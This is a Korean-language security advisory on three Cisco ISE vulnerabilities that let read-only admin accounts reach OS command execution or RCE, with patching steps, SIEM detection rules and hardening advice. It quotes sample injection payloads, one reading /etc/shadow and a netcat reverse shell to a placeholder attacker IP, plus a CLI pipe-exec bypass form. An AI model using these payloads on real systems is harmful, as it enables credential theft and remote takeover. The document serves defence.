Cisco ISE 읽기전용 관리자 권한 상승 취약점 대응

Cisco ISE 읽기전용 관리자 권한 상승 취약점의 공격 영향, 패치 적용, 탐지 규칙과 NAC 관리 접근 통제 방안을 정리한다.

2026-08-14 · 최초 발행 2026-08-02

읽기전용 관리자 계정이 NAC의 신뢰 경계를 넘는 경우

Cisco Identity Services Engine(ISE)에서 공개된 CVE-2026-20180, CVE-2026-20186, CVE-2026-20147은 인증된 읽기전용 관리자 계정을 보유한 공격자가 기반 OS 명령 실행이나 원격 코드 실행으로 이어질 수 있는 취약점이다. 사용자·디바이스 인증, 권한 부여, 감사(AAA)를 맡는 NAC 플랫폼인 만큼, 영향은 개별 관리 기능에 그치지 않는다.

세 취약점은 모두 CVSS 8.0 이상의 Critical/High 등급으로 분류된다. 피싱, 자격 증명 탈취, 내부자 위협을 통해 읽기전용 계정이 노출될 수 있다는 점에서, 역할 이름과 실제 접근 범위가 일치하는지 점검해야 한다.

식별자 영향 경로
CVE-2026-20180 Admin GUI의 특정 API 엔드포인트에서 입력값 검증이 빠져 읽기전용 관리자가 기반 OS의 root 수준 임의 명령을 실행할 수 있음
CVE-2026-20186 CLI 경로의 권한 검증 로직을 우회해 읽기전용 계정이 privileged exec mode에 진입할 수 있음
CVE-2026-20147 노드 간 통신의 직렬화 처리 문제로 인증된 공격자가 조작된 페이로드를 보내 RCE를 달성할 수 있음

역할 기반 접근 통제가 무너지는 지점

ISE는 관리자 계정에 계층형 RBAC(Role-Based Access Control)를 적용한다.

역할 권한 범위
Super Admin 전체 구성·운영
Network Admin 네트워크 디바이스 정책
System Admin 시스템 레벨 설정
Read-Only Admin 조회 전용 (이론상)
Helpdesk Admin 제한적 운영 작업

이번 취약점에서 핵심은 Read-Only Admin이 실제로는 조회에만 머물지 않을 수 있다는 점이다.

CVE-2026-20180은 Admin GUI의 REST API 가운데 특정 진단 엔드포인트가 OS 수준 명령을 직접 호출하는 래퍼 함수를 사용하는 경로와 관련된다. 읽기전용 역할이 API 응답 조회 권한을 가지면서도 입력 파라미터 검증이 없다면 OS Command Injection이 성립한다. 원본에서 제시된 페이로드 예시는 ; cat /etc/shadow, ; nc -e /bin/bash <attacker_ip> 4444다.

CVE-2026-20186에서는 IOS 기반 명령 구조를 따르는 CLI가 문제 경로다. 읽기전용 계정은 show 명령 계열만 허용되어야 하지만, 특정 debug 명령과 파이프(|) 조합에서 권한 검증이 누락된 코드 경로가 존재한다. show running-config | exec <command> 형태의 변형 명령으로 privileged 명령 실행이 가능하다.

CVE-2026-20147은 다중 노드 배포에서 PAN(Primary Admin Node)과 PSN(Policy Service Node) 사이에 Java 직렬화 객체가 전달되는 통신을 다룬다. 이 경로는 인증을 요구하지만 읽기전용 관리자 수준의 인증 토큰으로 접근할 수 있으며, Gadget Chain을 활용한 조작된 직렬화 페이로드로 PSN에서 RCE를 달성할 수 있다. 취약 노드 하나를 장악한 뒤 내부 신뢰 관계를 이용해 ISE 클러스터 전체로 침투할 가능성이 있다.

공격 경로와 즉시 완화 조치

긴급 완화 조치CVE-2026-20180CVE-2026-20186CVE-2026-20147완화완화완화탐지공격자(읽기전용 관리자 권한 탈취)공격 경로 선택Admin GUI APICommand InjectionCLI 권한 우회Privileged Exec 진입Inter-node 통신Deserialization RCE기반 OS임의 명령 실행PSN 노드 장악클러스터 내부 신뢰 체인전체 NAC 인프라 침투(1) 정책 DB 조작인증 우회 백도어 삽입(2) 자격증명 탈취RADIUS Secret 노출(3) 전체 네트워크 접근 통제무력화읽기전용 계정최소화·비활성화관리 인터페이스전용 OOB 분리ISE 패치 즉시 적용3.3 Patch 4 / 3.4 Patch 1SIEM 이상 탐지규칙 즉시 배포

정책 DB 조작, 인증 우회 백도어 삽입, RADIUS Secret 노출, 네트워크 접근 통제 무력화는 모두 클러스터 침투 이후의 영향 범위에 포함된다. 따라서 패치만으로 대응 범위를 제한하지 말고 계정, 관리망, 탐지 체계를 동시에 다뤄야 한다.

유지보수 창까지 이어지는 패치 운영

취약 버전 패치 적용 버전 긴급도
ISE 3.3 및 이전 3.3 Patch 4 이상 Critical
ISE 3.4 3.4 Patch 1 이상 Critical
ISE 3.1, 3.2 EoS 도달, 업그레이드 필수 High

패치 전 D-3 ~ D-1에는 현재 ISE 버전을 전수 조사해 취약 노드를 식별하고, Configuration Backup과 Operational Data Backup을 포함한 전체 설정 백업을 확보한다. 변경 관리(Change Management) 위원회의 긴급 승인을 받은 뒤 스테이징 환경에서 RADIUS 인증 정상 동작과 정책 미적용 케이스를 검증한다.

읽기전용 계정은 즉시 재검토한다. ISE 관리 콘솔의 Administration → Admin Access → Administrators에서 해당 역할 보유 계정을 확인하고, 불필요한 계정은 비활성화한다. 필수 계정만 유지하면서 Multi-Factor Authentication(MFA) 적용 여부를 확인하고, 관리자 접근 로그 감사 주기는 일 1회에서 실시간 SIEM 연동으로 변경한다.

관리 인터페이스는 OOB 관리망으로만 접근하도록 제한한다. ISE Admin GUI의 443/TCP는 OOB 관리망에서만 허용하고, 운영 네트워크에서 ISE 관리 IP로의 접근은 ACL 또는 방화벽 정책으로 차단한다. CLI SSH는 Jump Host를 통해서만 허용하며, 출발지 IP는 관리 워크스테이션으로 화이트리스트를 한정한다.

유지보수 창에서는 Secondary Admin Node, Primary Admin Node 순으로 롤링 패치를 적용한다. PSN(Policy Service Node)은 서비스 무중단을 유지하도록 순차 적용하고, MnT(Monitoring and Troubleshooting) Node를 마지막에 처리한다. 각 노드의 패치 뒤에는 다음 명령으로 서비스 상태를 확인한다.

show application status ise

패치 후에는 802.1X, MAB, VPN의 RADIUS 인증 시나리오와 Guest Portal, BYOD Enrollment 흐름을 검증한다. Tenable, Qualys 같은 취약점 스캐너로 CVE 잔존 여부를 다시 확인하고, 보안 팀에 패치 완료 보고서를 제출한다.

API·CLI·노드 통신에서 남겨야 할 탐지 신호

패치 적용 전은 물론 패치 후에도 이상 행위 탐지가 필요하다. Read-Only 계정의 쓰기 요청, 비정상 CLI 명령, 노드 간 통신량 변화, OS 하위 프로세스 생성이 주요 관찰 지점이다.

Read-Only 계정이 POST, PUT, DELETE 요청을 수행했는지 확인하는 Splunk/SIEM 규칙은 다음과 같다.

index=cisco_ise sourcetype="cisco:ise:syslog"
| search admin_role="ReadOnly" api_method="POST" OR api_method="PUT" OR api_method="DELETE"
| stats count by src_ip, admin_user, api_endpoint, _time
| where count > 0
| alert

CLI 로그에서는 debug, exec, 파이프, bash, nc와 관련된 패턴을 별도로 살핀다.

index=cisco_ise sourcetype="cisco:ise:cli"
| search command="*debug*exec*" OR command="*|*bash*" OR command="*nc *"
| table _time, src_ip, user, command
| alert

노드 간 통신 포트 8443, 8905에서는 트래픽 크기 증가를 모니터링하고, 정상 범위 대비 3σ를 초과하면 즉시 알림을 발생시킨다. ISE 호스트 OS에는 EDR(Carbon Black, CrowdStrike)을 연동해 ise 프로세스 하위에서 bash, sh, python, nc 같은 예외 프로세스가 생성되면 Critical 알림을 내도록 구성한다.

역할 이름이 아니라 기능 단위로 권한을 나누기

이번 사례는 읽기전용이라는 라벨이 실제 시스템의 접근 범위를 보장하지 않는다는 점을 보여준다. NAC 관리 아키텍처에는 제로 트러스트(Zero Trust) 원칙을 적용해야 한다.

  • Read-Only Admin을 Network Monitoring Only, Report View Only, Policy Read Only처럼 기능별 역할로 세분화한다.
  • 읽기전용 관리자 세션은 최대 30분으로 제한하고 자동 로그아웃을 적용한다.
  • 관리자별 허용 출발지 IP 화이트리스트를 강제한다.
  • 모든 ISE 관리자 계정에 Duo, RSA 등의 MFA를 적용하며, 특히 SSH CLI 접근을 확인한다.
  • ISE syslog는 읽기전용 계정이 수정할 수 없는 외부 SIEM으로 실시간 전송한다.
  • ISE 관리는 Privileged Access Workstation(PAW)처럼 전용 강화 워크스테이션에서만 허용한다.

NAC 제품별 관리 보안 구조

항목 Cisco ISE Aruba ClearPass Microsoft NPS
관리자 RBAC 계층형, 상세 역할·서비스 분리 AD 그룹 기반, 단순
관리 인터페이스 분리 OOB 지원, 추가 설정 필요 기본 분리 옵션 IIS 기반, 수동 설정
Deserialization 취약점 이력 이번 포함 다수 상대적으로 적음 COM 기반, 별도 취약점
MFA 관리 접근 지원 TACACS+ 연동, Duo 지원 RADIUS MFA 네이티브 Azure MFA 연동
패치 주기 분기 (Critical는 즉시) 분기 Windows Update 연동
Zero Trust 통합 Cisco Secure 포트폴리오 연계 HPE Aruba CX 연계 Azure AD 조건부 접근
엔터프라이즈 복잡도 높음 (기능 풍부) 중간 낮음 (기능 제한)
CVE 취약점 공개 이력 (최근 3년) 다수 (인지도 높아 연구 집중) 중간 낮음

Cisco ISE는 기능 완성도와 Cisco 생태계 통합 측면에서 강점이 있지만, 복잡성이 공격 표면을 확대하는 구조적 트레이드오프를 가진다. Aruba ClearPass는 관리 인터페이스 분리와 MFA 통합에서 기본 설계가 더 보안 친화적이며, Microsoft NPS는 단순성으로 취약점이 적지만 엔터프라이즈 NAC 요구사항을 충족하지 못하는 경우가 많다.

취약점 공지를 운영 체계로 연결하는 방법

Cisco PSIRT RSS/API와 https://tools.cisco.com/security/center/publicationListing.x RSS 피드를 SIEM 또는 SOAR에 수집한다. NVD API를 통해 보유 Cisco 제품 버전과 신규 CVE를 자동 매핑하고, Tenable.io 또는 Qualys로 ISE 노드를 주간 스캔해 CVE가 검출되면 티켓을 자동 생성한다.

패치 SLA는 Critical(CVSS 9.0+) 72시간, High(7.0~8.9) 7일, Medium 30일 이내 완료 KPI로 설정한다. Cisco Support API를 연동하면 보유 장비 버전과 최신 권장 버전을 비교해 알림을 받을 수 있다.

NAC 관리 접근을 검토할 때의 설계 항목

NAC 보안 설계에서는 AAA, 802.1X, RADIUS/TACACS+, 포트 기반 접근 제어와 함께 취약점 관리와 접근 통제를 연결해 다뤄야 한다. CVE/CVSS 체계, Patch Management Life Cycle, 취약점 등급별 대응 절차는 관리 접근 통제와 분리된 운영 과제가 아니다.

RBAC와 ABAC, 최소 권한 원칙(Principle of Least Privilege), 직무 분리(Separation of Duties), Defense in Depth, Zero Trust Architecture, OOB 관리망 설계, MFA, PAM(Privileged Access Management)이 이 사례에 함께 적용되는 개념이다. NAC 관리자 권한 상승에 대응하는 아키텍처에서는 RBAC 세분화, 세션 제한, IP 화이트리스트, OOB 관리망 분리, 패치 관리 자동화, SIEM 연동, 지속 검증(Continuous Verification)을 한 흐름으로 설계한다.

NAC 환경에서 이어지는 변화

Cisco ISE 3.4+에서는 AI/ML 기반 행위 분석(Behavioral Analytics)이 강화되고, 읽기전용 계정의 비정상 API 호출 패턴을 실시간으로 자동 탐지하는 방향으로 진화한다. 기존 경계 보안 기반 NAC는 "항상 검증(Never Trust, Always Verify)" 모델로 전환되며 Cisco Secure Access(ZTNA)와 ISE의 통합도 가속화된다.

On-premise ISE에서 Cisco ISE on Cloud(AWS/Azure 배포)로 전환하는 흐름에서는 클라우드 IAM과 NAC의 통합이 핵심 과제다. NAC 인프라 자체가 공격 표면이 되는 상황에서는 벤더 패치 의존에서 Architecture-level 방어로 전략을 옮길 필요가 있다. ICS와 IoT 디바이스를 ISE로 통합 관리하는 수요가 늘면서, 이 취약점은 OT 환경에서 물리적 피해로 이어질 수 있다는 경고이기도 하다.

조직 대응은 패치 적용, 읽기전용 계정 최소화, 관리망 분리에서 시작한다. 30일 내에는 SIEM 탐지 규칙 배포, MFA 전면화, PAW 도입을 진행하고, 90일 내에는 자동화 취약점 모니터링과 Zero Trust 관리 접근 설계를 구축한다. 180일 내에는 AI 기반 이상 탐지를 통합하고 전사 NAC 아키텍처 재검토를 완료하는 흐름으로 이어진다.

Sources

  • Cisco Security Advisory: cisco-sa-ise-multi-vuln-2026 (https://tools.cisco.com/security/center/publicationListing.x)
  • NIST NVD: CVE-2026-20180, CVE-2026-20186, CVE-2026-20147 (https://nvd.nist.gov)
  • Cisco ISE Administrator Guide 3.4 — Admin Access Configuration
  • CIS Critical Security Controls v8: Control 7 (Continuous Vulnerability Management)
  • NIST SP 800-53 Rev.5: AC-6 (Least Privilege), SI-2 (Flaw Remediation)
  • Cisco PSIRT Blog: ISE Vulnerability Disclosure 2026
Cisco ISENAC 보안취약점 관리권한 상승제로 트러스트